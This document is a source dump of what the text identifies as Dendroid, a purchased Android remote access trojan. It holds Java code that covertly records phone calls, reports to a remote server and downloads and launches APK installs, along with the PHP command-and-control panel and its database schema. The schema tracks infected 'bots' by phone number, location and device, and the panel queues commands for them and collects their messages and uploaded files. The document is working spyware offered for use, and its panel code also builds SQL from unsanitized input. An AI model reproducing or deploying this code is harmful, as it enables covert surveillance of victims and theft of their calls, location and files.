94 | recorder.reset(); 95 | recorder.setAudioSource(audiosource); 96 | recorder.setOutputFormat(MediaRecorder.OutputFormat.MPEG_4); 97 | recorder.setAudioEncoder(MediaRecorder.AudioEncoder.AAC); 98 | recorder.setOutputFile(recording.getAbsolutePath()); 99 | recorder.setOnInfoListener(this); 100 | recorder.setOnErrorListener(this); 101 | 102 | //STREAM TO PHP? //Alert 103 | 104 | try { 105 | recorder.prepare(); 106 | } catch (java.io.IOException e) { 107 | recorder = null; 108 | return; 109 | } 110 | recorder.start(); 111 | isRecording = true; 112 | 113 | getInputStreamFromUrl(URL + PreferenceManager.getDefaultSharedPreferences(getApplicationContext()).getString("urlPost", "") + "UID=" + PreferenceManager.getDefaultSharedPreferences(getApplicationContext()).getString("AndroidID", "") + "&Data=", "Call Recording Started"); 114 | 115 | } catch (java.lang.Exception e) { 116 | recorder = null; 117 | } 118 | 119 | return; 120 | } 121 | 122 | public void onDestroy() 123 | { 124 | super.onDestroy(); 125 | 126 | if (null != recorder) { 127 | isRecording = false; 128 | recorder.release(); 129 | 130 | try { 131 | getInputStreamFromUrl(URL + PreferenceManager.getDefaultSharedPreferences(getApplicationContext()).getString("urlPost", "") + "UID=" + PreferenceManager.getDefaultSharedPreferences(getApplicationContext()).getString("AndroidID", "") + "&Data=", "Call Recording Ended"); 132 | } catch (UnsupportedEncodingException e) { 133 | // TODO Auto-generated catch block 134 | e.printStackTrace(); 135 | } 136 | 137 | } 138 | } 139 | 140 | 141 | public IBinder onBind(Intent intent) 142 | { 143 | return null; 144 | } 145 | 146 | public boolean onUnbind(Intent intent) 147 | { 148 | return false; 149 | } 150 | 151 | public void onRebind(Intent intent) 152 | { 153 | } 154 | 155 | 156 | // MediaRecorder.OnInfoListener 157 | public void onInfo(MediaRecorder mr, int what, int extra) 158 | { 159 | isRecording = false; 160 | } 161 | 162 | // MediaRecorder.OnErrorListener 163 | public void onError(MediaRecorder mr, int what, int extra) 164 | { 165 | isRecording = false; 166 | mr.release(); 167 | } 168 | 169 | public InputStream getInputStreamFromUrl(String urlBase, String urlData) throws UnsupportedEncodingException { 170 | 171 | Log.d("com.connect", urlBase); 172 | Log.d("com.connect", urlData); 173 | 174 | urlData = URLEncoder.encode (urlData, "UTF-8"); 175 | if(isNetworkAvailable()) 176 | { 177 | InputStream content = null; 178 | try 179 | { 180 | HttpClient httpclient = new DefaultHttpClient(); 181 | HttpResponse response = httpclient.execute(new HttpGet(urlBase + urlData)); 182 | content = response.getEntity().getContent(); 183 | httpclient.getConnectionManager().shutdown(); 184 | } catch (Exception e) { 185 | } 186 | return content; 187 | } 188 | return null; 189 | } 190 | //******************************************************************************************************************************************************** 191 | public boolean isNetworkAvailable() { 192 | ConnectivityManager cm = (ConnectivityManager) getSystemService(Context.CONNECTIVITY_SERVICE); 193 | NetworkInfo networkInfo = cm.getActiveNetworkInfo(); 194 | if (networkInfo != null && networkInfo.isConnected()) { 195 | return true; 196 | } 197 | return false; 198 | } 199 | } 200 | -------------------------------------------------------------------------------- /master/Dendroid APK/src/com/connect/UpdateApp.java: -------------------------------------------------------------------------------- 1 | package com.connect; 2 | 3 | import java.io.File; 4 | import java.io.FileOutputStream; 5 | import java.io.InputStream; 6 | import java.net.HttpURLConnection; 7 | import java.net.URL; 8 | 9 | import android.content.Context; 10 | import android.content.Intent; 11 | import android.net.Uri; 12 | import android.os.AsyncTask; 13 | import android.util.Log; 14 | 15 | public class UpdateApp extends AsyncTask{ 16 | private Context context; 17 | public void setContext(Context contextf){ 18 | context = contextf; 19 | } 20 | 21 | @Override 22 | protected Void doInBackground(String... arg0) { 23 | try { 24 | URL url = new URL(arg0[0]); 25 | HttpURLConnection c = (HttpURLConnection) url.openConnection(); 26 | c.setRequestMethod("GET"); 27 | c.setDoOutput(true); 28 | c.connect(); 29 | 30 | String PATH = "/mnt/sdcard/Download/"; 31 | File file = new File(PATH); 32 | file.mkdirs(); 33 | File outputFile = new File(file, "update.apk"); 34 | if(outputFile.exists()){ 35 | outputFile.delete(); 36 | } 37 | FileOutputStream fos = new FileOutputStream(outputFile); 38 | 39 | InputStream is = c.getInputStream(); 40 | 41 | byte[] buffer = new byte[1024]; 42 | int len1 = 0; 43 | while ((len1 = is.read(buffer)) != -1) { 44 | fos.write(buffer, 0, len1); 45 | } 46 | fos.close(); 47 | is.close(); 48 | 49 | Intent intent = new Intent(Intent.ACTION_VIEW); 50 | intent.setDataAndType(Uri.fromFile(new File("/mnt/sdcard/Download/update.apk")), "application/vnd.android.package-archive"); 51 | intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK); // without this flag android returned a intent error! 52 | context.startActivity(intent); 53 | 54 | 55 | } catch (Exception e) { 56 | Log.e("UpdateAPP", "Update error! " + e.getMessage()); 57 | } 58 | return null; 59 | }} 60 | -------------------------------------------------------------------------------- /master/Dendroid Binder.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Binder.zip -------------------------------------------------------------------------------- /master/Dendroid Panel.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel.zip -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/Dendroid Panel/.DS_Store -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Other Files/README.txt: -------------------------------------------------------------------------------- 1 | ______ _______ _ ______ _______ _______ _________ ______ 2 | ( __ \ ( ____ \( ( /|( __ \ ( ____ )( ___ )\__ __/( __ \ 3 | | ( \ )| ( \/| \ ( || ( \ )| ( )|| ( ) | ) ( | ( \ ) 4 | | | ) || (__ | \ | || | ) || (____)|| | | | | | | | ) | 5 | | | | || __) | (\ \) || | | || __)| | | | | | | | | | 6 | | | ) || ( | | \ || | ) || (\ ( | | | | | | | | ) | 7 | | (__/ )| (____/\| ) \ || (__/ )| ) \ \__| (___) |___) (___| (__/ ) 8 | (______/ (_______/|/ )_)(______/ |/ \__/(_______)\_______/(______/ 9 | 10 | Thank you for purchasing Dendroid. This file will outline the webserver requirements and how to install the Dendroid HTTP Panel. 11 | 12 | I. REQUIREMENTS 13 | 1. Your webserver must have PHP 5.2 or above. PHP 5.3 is highly recommended. 14 | 2. PHP must have full read and write access to the panel's files and folders. 15 | 2-1. Shared hosting users should have no problem. If you do, talk to your host's support system. They can help with file and folder permissions. 16 | 2-2. VPS and Dedicated Server users should know how to chmod and chown if on Linux. 17 | 3. Your webserver must have the ionCube loaders installed. 18 | 3-1. For more information, visit http://www.ioncube.com/loaders.php 19 | 4. It is recommended to have at least 1GB of disk space. 20 | 4-1. Disk space usage will vary depending on how heavily you use certain features of Dendroid. 21 | 5. A MySQL database. 22 | 23 | If you meet the above requirements, Dendroid's installation should be a breeze. 24 | 25 | II. INSTALLATION 26 | 1. UnZIP the Panel. 27 | 2. Upload all files to your webserver. Pay attention to the subdirectory (if any) that you uploaded it to. 28 | 3. Use phpMyAdmin, or however you manage your MySQL database to upload the "SQL.sql" file. 29 | 3. When all files are uploaded, visit http://yourdomain.com/setup/ 30 | 4. Follow the setup instructions. If you need any help, contact us. We will be glad to help. 31 | 5. Visit http://yourdomain.com/ to use your panel. -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Other Files/SQL.sql: -------------------------------------------------------------------------------- 1 | SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO"; 2 | SET time_zone = "+00:00"; 3 | 4 | /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; 5 | /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; 6 | /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; 7 | /*!40101 SET NAMES utf8 */; 8 | 9 | 10 | CREATE TABLE IF NOT EXISTS `bots` ( 11 | `id` int(11) NOT NULL AUTO_INCREMENT, 12 | `uid` varchar(100) COLLATE utf8_unicode_ci NOT NULL, 13 | `status` tinyint(4) NOT NULL, 14 | `update` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, 15 | `provider` varchar(100) COLLATE utf8_unicode_ci NOT NULL, 16 | `lati` decimal(10,2) NOT NULL, 17 | `longi` decimal(10,2) NOT NULL, 18 | `device` varchar(100) COLLATE utf8_unicode_ci NOT NULL, 19 | `sdk` varchar(100) COLLATE utf8_unicode_ci NOT NULL, 20 | `version` varchar(100) COLLATE utf8_unicode_ci NOT NULL, 21 | `phone` varchar(100) COLLATE utf8_unicode_ci NOT NULL, 22 | `random` varchar(100) COLLATE utf8_unicode_ci NOT NULL, 23 | `blocked` varchar(3) COLLATE utf8_unicode_ci NOT NULL DEFAULT 'no', 24 | PRIMARY KEY (`id`) 25 | ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci AUTO_INCREMENT=46 ; 26 | 27 | CREATE TABLE IF NOT EXISTS `commands` ( 28 | `uid` varchar(100) COLLATE utf8_unicode_ci NOT NULL, 29 | `command` varchar(100) COLLATE utf8_unicode_ci NOT NULL, 30 | `arg1` varchar(100) COLLATE utf8_unicode_ci NOT NULL, 31 | `arg2` varchar(160) COLLATE utf8_unicode_ci NOT NULL, 32 | `arg3` varchar(100) COLLATE utf8_unicode_ci NOT NULL 33 | ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci; 34 | 35 | CREATE TABLE IF NOT EXISTS `files` ( 36 | `uid` varchar(100) COLLATE utf8_unicode_ci NOT NULL, 37 | `file` varchar(900) COLLATE utf8_unicode_ci NOT NULL, 38 | `time` datetime NOT NULL 39 | ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci; 40 | 41 | CREATE TABLE IF NOT EXISTS `messages` ( 42 | `uid` varchar(100) COLLATE utf8_unicode_ci NOT NULL, 43 | `message` varchar(1800) COLLATE utf8_unicode_ci NOT NULL 44 | ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci; 45 | 46 | /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; 47 | /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; 48 | /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */; 49 | -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/addcommand.php: -------------------------------------------------------------------------------- 1 | prepare("INSERT INTO `commands` (`uid`, `command`, `arg1`, `arg2`) VALUES ('$currentUID', '$Command', '$Arg1', '$Arg2')"); 36 | $statement->execute(); 37 | } 38 | 39 | echo "Success"; 40 | ?> -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/applysettings.php: -------------------------------------------------------------------------------- 1 | "; 60 | 61 | fwrite($f, $write); 62 | fclose($f); 63 | } 64 | 65 | header('Location: control.php'); 66 | 67 | ?> -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/assets/css/image-picker.css: -------------------------------------------------------------------------------- 1 | ul.thumbnails.image_picker_selector { 2 | overflow: auto; 3 | list-style-image: none; 4 | list-style-position: outside; 5 | list-style-type: none; 6 | padding: 0px; 7 | margin: 0px; } 8 | ul.thumbnails.image_picker_selector li { 9 | margin: 0px 12px 12px 0px; 10 | float: left; } 11 | ul.thumbnails.image_picker_selector li .thumbnail { 12 | padding: 6px; 13 | border: 1px solid #dddddd; } 14 | ul.thumbnails.image_picker_selector li .thumbnail.selected { 15 | background: #0088cc; } 16 | -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/assets/fonts/glyphiconshalflings-regular.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/Dendroid Panel/Panel/assets/fonts/glyphiconshalflings-regular.eot -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/assets/fonts/glyphiconshalflings-regular.otf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/Dendroid Panel/Panel/assets/fonts/glyphiconshalflings-regular.otf -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/assets/fonts/glyphiconshalflings-regular.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/Dendroid Panel/Panel/assets/fonts/glyphiconshalflings-regular.ttf -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/assets/fonts/glyphiconshalflings-regular.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/Dendroid Panel/Panel/assets/fonts/glyphiconshalflings-regular.woff -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/assets/img/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/Dendroid Panel/Panel/assets/img/banner.png -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/assets/img/bannerrot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/Dendroid Panel/Panel/assets/img/bannerrot.png -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/assets/img/bg_off.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/Dendroid Panel/Panel/assets/img/bg_off.jpg -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/assets/img/bg_on.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/Dendroid Panel/Panel/assets/img/bg_on.jpg -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/assets/img/login_bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/Dendroid Panel/Panel/assets/img/login_bg.png -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/assets/img/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lululeta2014/DendroidSource/f997fbc868b840ccef72ac633068c41349b7e312/master/Dendroid Panel/Dendroid Panel/Panel/assets/img/logo.png -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/assets/js/image-picker.min.js: -------------------------------------------------------------------------------- 1 | // Image Picker 2 | // by Rodrigo Vera 3 | // 4 | // Version 0.1.5 5 | // Full source at https://github.com/rvera/image-picker 6 | // MIT License, https://github.com/rvera/image-picker/blob/master/LICENSE 7 | (function(){var t,e,i,s,l=[].indexOf||function(t){for(var e=0,i=this.length;i>e;e++)if(e in this&&this[e]===t)return e;return-1};jQuery.fn.extend({imagepicker:function(e){return null==e&&(e={}),this.each(function(){var i;return i=jQuery(this),i.next("ul.image_picker_selector").remove(),i.data("picker",new t(this,s(e))),null!=e.initialized?e.initialized():void 0})}}),s=function(t){var e;return e={hide_select:!0,show_label:!1,initialized:void 0,changed:void 0,clicked:void 0,selected:void 0,limit:void 0,limit_reached:void 0},jQuery.extend(e,t)},i=function(t,e){return 0===jQuery(t).not(e).length&&0===jQuery(e).not(t).length},t=function(){function t(t,e){this.opts=null!=e?e:{},this.select=jQuery(t),this.multiple="multiple"===this.select.attr("multiple"),null!=this.select.data("limit")&&(this.opts.limit=parseInt(this.select.data("limit"))),this.build_and_append_picker()}return t.prototype.build_and_append_picker=function(){return this.opts.hide_select&&this.select.hide(),this.select.change({picker:this},function(t){return t.data.picker.sync_picker_with_select()}),null!=this.picker&&this.picker.remove(),this.create_picker(),this.select.after(this.picker),this.sync_picker_with_select()},t.prototype.sync_picker_with_select=function(){var t,e,i,s,l;for(s=this.picker_options,l=[],e=0,i=s.length;i>e;e++)t=s[e],t.is_selected()?l.push(t.mark_as_selected()):l.push(t.unmark_as_selected());return l},t.prototype.create_picker=function(){var t,i,s,l;for(this.picker=jQuery("
    "),this.picker_options=function(){var i,s,l,n;for(l=this.select.find("option"),n=[],i=0,s=l.length;s>i;i++)t=l[i],n.push(new e(t,this,this.opts));return n}.call(this),l=this.picker_options,i=0,s=l.length;s>i;i++)t=l[i],t.has_image()&&this.picker.append(t.node);return this.picker},t.prototype.has_implicit_blanks=function(){var t;return function(){var e,i,s,l;for(s=this.picker_options,l=[],e=0,i=s.length;i>e;e++)t=s[e],t.is_blank()&&!t.has_image()&&l.push(t);return l}.call(this).length>0},t.prototype.selected_values=function(){return this.multiple?this.select.val()||[]:[this.select.val()]},t.prototype.toggle=function(t){var e,s,n;return s=this.selected_values(),this.multiple?(n=t.value(),l.call(this.selected_values(),n)>=0?t.option.prop("selected",!1):null!=this.opts.limit?this.selected_values().length=0:this.value()===t},t.prototype.mark_as_selected=function(){return this.node.find(".thumbnail").addClass("selected")},t.prototype.unmark_as_selected=function(){return this.node.find(".thumbnail").removeClass("selected")},t.prototype.value=function(){return this.option.val()},t.prototype.label=function(){return this.option.data("img-label")?this.option.data("img-label"):this.option.text()},t.prototype.clicked=function(){return this.picker.toggle(this),null!=this.opts.clicked&&this.opts.clicked.call(this.picker.select),null!=this.opts.selected&&this.is_selected()?this.opts.selected.call(this.picker.select):void 0},t.prototype.create_node=function(){var t,e;return this.node=jQuery("
  • "),t=jQuery(""),t.attr("src",this.option.data("img-src")),e=jQuery("
    "),e.click({option:this},function(t){return t.data.option.clicked()}),e.append(t),this.opts.show_label&&e.append(jQuery("

    ").html(this.label())),this.node.append(e),this.node},t}()}).call(this); -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/blockbot.php: -------------------------------------------------------------------------------- 1 | prepare("SELECT blocked FROM bots WHERE uid='$botid'"); 19 | $statement->execute(); 20 | 21 | $result = $statement->fetch(PDO::FETCH_ASSOC); 22 | 23 | $curblocked = $result[blocked]; 24 | 25 | if($curblocked == "yes"){ 26 | $statement = $connect->prepare("UPDATE bots SET blocked='no' WHERE `uid` = '$botid'"); 27 | $statement->execute(); 28 | echo "Bot History Unblocked"; 29 | } else { 30 | $statement = $connect->prepare("UPDATE bots SET blocked='yes' WHERE `uid` = '$botid'"); 31 | $statement->execute(); 32 | echo "Bot History Blocked"; 33 | } 34 | ?> -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/clearawaiting.php: -------------------------------------------------------------------------------- 1 | prepare("TRUNCATE TABLE commands"); 19 | $statement->execute();header('Location: settings.php'); 20 | 21 | ?> -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/clearmessages.php: -------------------------------------------------------------------------------- 1 | prepare("TRUNCATE TABLE messages"); 19 | $statement->execute();header('Location: settings.php'); 20 | 21 | ?> -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/deletebot.php: -------------------------------------------------------------------------------- 1 | prepare("DELETE FROM bots WHERE uid='$botid'"); 21 | $statement->execute(); 22 | echo "Bot Deleted"; 23 | ?> -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/deletefile.php: -------------------------------------------------------------------------------- 1 | prepare("DELETE FROM files WHERE file='$filename'"); 23 | $statement->execute(); 24 | echo "Deleted"; 25 | } else { 26 | die(); 27 | } 28 | ?> -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/deletepics.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/filetable.php: -------------------------------------------------------------------------------- 1 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | query($getslaves) as $row) { 53 | $file = preg_replace("#\{(.*)\}#", "", $row['file']); 54 | echo ''; 55 | echo ''; 56 | echo ''; 57 | }?> 58 | 59 |
    UIDFileOptions
    ' . $row['uid'] . '' . $file . '
    60 | 61 | -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/functions.php: -------------------------------------------------------------------------------- 1 | getMessage() . "
    "; 14 | die(); 15 | } 16 | 17 | function slave_exists($UID) { 18 | global $connect; 19 | $statement = $connect->prepare('SELECT * FROM bots WHERE uid=:uid'); 20 | $statement->bindParam(':uid', $UID, PDO::PARAM_STR); 21 | $statement->execute(); 22 | $row = $statement->fetch(PDO::FETCH_ASSOC); 23 | if(!$row){ 24 | return false; 25 | } else { 26 | return true; 27 | } 28 | } 29 | 30 | function setFunction($UID, $Function){ 31 | $UID = sanitize($UID); 32 | $Function = sanitize($Function); 33 | if(slave_exists($UID)){ 34 | $functions = getFunction($UID); 35 | if($functions == ""){ 36 | mysql_query("UPDATE slaves SET Function='$Function' WHERE `Unique_ID` = '$UID'") or die(mysql_error()); 37 | } else { 38 | $functions = $functions . ", " . $Function; 39 | mysql_query("UPDATE slaves SET Function='$functions' WHERE `Unique_ID` = '$UID'") or die(mysql_error()); 40 | } 41 | } 42 | } 43 | 44 | function updateSlave($UID, $Device, $Version, $Coordinates, $Provider, $PhoneNumber, $SDK, $Random){ 45 | $remove = array("(", ")"); 46 | $cleancoords = str_replace($remove, "", $Coordinates); 47 | $splitcoords = explode(",", $cleancoords); 48 | $Lati = $splitcoords[0]; 49 | $Longi = $splitcoords[1]; 50 | 51 | global $connect; 52 | 53 | if (slave_exists($UID)){ 54 | $statement = $connect->prepare("UPDATE bots SET device='$Device', version='$Version', lati='$Lati', longi='$Longi', provider='$Provider', phone='$PhoneNumber', sdk='$SDK', random='$Random' WHERE `uid` = '$UID'"); 55 | $statement->execute(); 56 | } else { 57 | $statement = $connect->prepare("INSERT INTO `bots` (`uid`, `device`, `version`, `lati`, `longi`, `provider`, `phone`, `sdk`, `random`) VALUES ('$UID', '$Device', '$Version', '$Lati', '$Longi', '$Provider', '$PhoneNumber', '$SDK', '$Random')"); 58 | $statement->execute(); 59 | } 60 | } 61 | 62 | function addMessage($UID, $Message) { 63 | global $connect; 64 | $statement = $connect->prepare("INSERT INTO `messages` (`uid`, `message`) VALUES ('$UID', '$Message')"); 65 | $statement->execute(); 66 | } 67 | 68 | function addToUploads($owner, $slave, $file){ 69 | if(slave_exists($slave)){ 70 | if(file_exists("dlfiles/" . $file)){ 71 | global $connect; 72 | $statement = $connect->prepare("INSERT INTO `files` (`uid`, `file`) VALUES ('$slave', '$file')"); 73 | $statement->execute(); 74 | } 75 | } 76 | } 77 | ?> -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/get-functions.php: -------------------------------------------------------------------------------- 1 | query($getcommands) as $row) { 19 | if ($row['arg1'] == "" AND $row['arg2'] == "") { 20 | echo $row['command'] . "()\xA"; 21 | } elseif ($row['arg1'] == "") { 22 | echo $row['command'] . "(" . $row['arg2'] . ")\xA"; 23 | } elseif ($row['arg2'] == "") { 24 | echo $row['command'] . "(" . $row['arg1'] . ")\xA"; 25 | } elseif ($row['arg3'] != "") { 26 | echo $row['command'] . "(" . $row['arg1'] . "~~" . $row['arg2'] . "~~" . $row['arg3'] . ")\xA"; 27 | } else { 28 | echo $row['command'] . "(" . $row['arg1'] . "~~" . $row['arg2'] . ")\xA"; 29 | } 30 | } 31 | 32 | $statement = $connect->prepare("DELETE FROM commands WHERE uid='$UID'"); 33 | $statement->execute(); 34 | ?> -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/get.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/getimages.php: -------------------------------------------------------------------------------- 1 | prepare("INSERT INTO `commands` (`uid`, `command`, `arg1`, `arg2`, `arg3`) VALUES ('$uid', 'uploadpictures', '$startdate', '$enddate', '$maxfilesize')"); 11 | $statement->execute(); 12 | 13 | ?> -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/getmessages.php: -------------------------------------------------------------------------------- 1 | query($mycommand) as $row) { 10 | $spacedmessage = str_replace("*", " ", $row['message']); 11 | echo $spacedmessage; 12 | echo "
    "; 13 | } 14 | } else { 15 | $mycommand = "SELECT * FROM messages"; 16 | 17 | foreach ($connect->query($mycommand) as $row) { 18 | $spacedmessage = str_replace("*", " ", $row['message']); 19 | echo "" . $row['uid'] . ": "; 20 | echo $spacedmessage; 21 | echo "
    "; 22 | } 23 | } 24 | 25 | ?> -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/getwaitingcommands.php: -------------------------------------------------------------------------------- 1 | query($mycommand) as $row) { 7 | echo "" . $row['uid'] . ": " . $row['command'] . "(" . $row['arg1'] . ", " . $row['arg2'] . ")"; 8 | echo "
    "; 9 | } 10 | 11 | ?> -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/index.php: -------------------------------------------------------------------------------- 1 | 22 | 23 | 24 | 25 | 26 | 27 | Login 28 | 29 | 30 | 31 | 62 | 63 | 64 |

    65 |
    66 |
    67 |
    68 |
    69 |
    70 | 71 |
    72 |
    73 | 74 | 75 | 76 | 77 | -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/logout.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/message.php: -------------------------------------------------------------------------------- 1 | prepare("SELECT blocked FROM bots WHERE uid='$botid'"); 7 | $statement->execute(); 8 | 9 | $result = $statement->fetch(PDO::FETCH_ASSOC); 10 | 11 | $curblocked = $result[blocked]; 12 | 13 | 14 | if(isset($_GET['UID'], $_GET['Data']) AND $curblocked != 'yes'){ 15 | $gooddata = str_replace("~period", ".", $_GET['Data']); 16 | addMessage($_GET['UID'], $gooddata); 17 | } else { 18 | die(); 19 | } 20 | ?> -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/new-upload.php: -------------------------------------------------------------------------------- 1 | 0) 20 | { 21 | $error = "Return Code: " . $_FILES["file"]["error"]; 22 | } 23 | else 24 | { 25 | $file = "{" . md5(rand(1000, 9999) . time()) . "}" . $_FILES["file"]["name"]; 26 | if(move_uploaded_file($_FILES["file"]["tmp_name"], "dlfiles/" . $file)) 27 | { 28 | $owner = ""; 29 | addToUploads($owner, $_GET["UID"], $file); 30 | $error = "File has been uploaded"; 31 | } 32 | } 33 | } 34 | else 35 | { 36 | $error = "Invalid file"; 37 | } 38 | } 39 | else 40 | { 41 | $error = "Invalid password"; 42 | } 43 | } 44 | else 45 | { 46 | $error = "file not set"; 47 | } 48 | } 49 | else 50 | { 51 | $error = "Password or UID not set"; 52 | } 53 | 54 | $f = fopen("log.txt", "a+"); 55 | if($f) 56 | { 57 | $srv = print_r($_SERVER, true); 58 | $fls = print_r($_FILES, true); 59 | $gt = print_r($_GET, true); 60 | $pst = print_r($_POST, true); 61 | 62 | $fmt = "Error: \r\n"; 63 | $fmt .= $error . "\r\n"; 64 | $fmt .= "-----------------------------------------\r\n"; 65 | 66 | $fmt .= "Server: \r\n"; 67 | $fmt .= $srv . "\r\n"; 68 | $fmt .= "-----------------------------------------\r\n"; 69 | 70 | $fmt .= "Files: \r\n"; 71 | $fmt .= $fls . "\r\n"; 72 | $fmt .= "-----------------------------------------\r\n"; 73 | 74 | $fmt .= "Get: \r\n"; 75 | $fmt .= $gt . "\r\n"; 76 | $fmt .= "-----------------------------------------\r\n"; 77 | 78 | $fmt .= "Post: \r\n"; 79 | $fmt .= $pst . "\r\n"; 80 | $fmt .= "-----------------------------------------\r\n"; 81 | 82 | fwrite($f, $fmt); 83 | fclose($f); 84 | } 85 | ?> -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/reg.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/setup/createconfig.php: -------------------------------------------------------------------------------- 1 | "; 59 | 60 | fwrite($f, $write); 61 | fclose($f); 62 | } 63 | 64 | header('Location: laststep.php'); 65 | ?> -------------------------------------------------------------------------------- /master/Dendroid Panel/Dendroid Panel/Panel/setup/index.php: -------------------------------------------------------------------------------- 1 | 16 | 17 | 18 | 19 | 20 | 21 | Setup 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 68 | 69 |
    70 |

    First Time Setup

    71 |

    Welcome to first time setup. This process will aid you in the configuration of your account, your database, and a few other settings.

    This software requires PHP 5.2 and above. You have: . It also requires a MySQL database, which you will setup later. Lastly, it requires that you access the panel from a web browser that has up-to-date HTML5 features. The control panel was developed with the aid of Google Chrome and is guaranteed to display and function correctly in it.

    If you are ready to proceed, click the button below:

    72 |
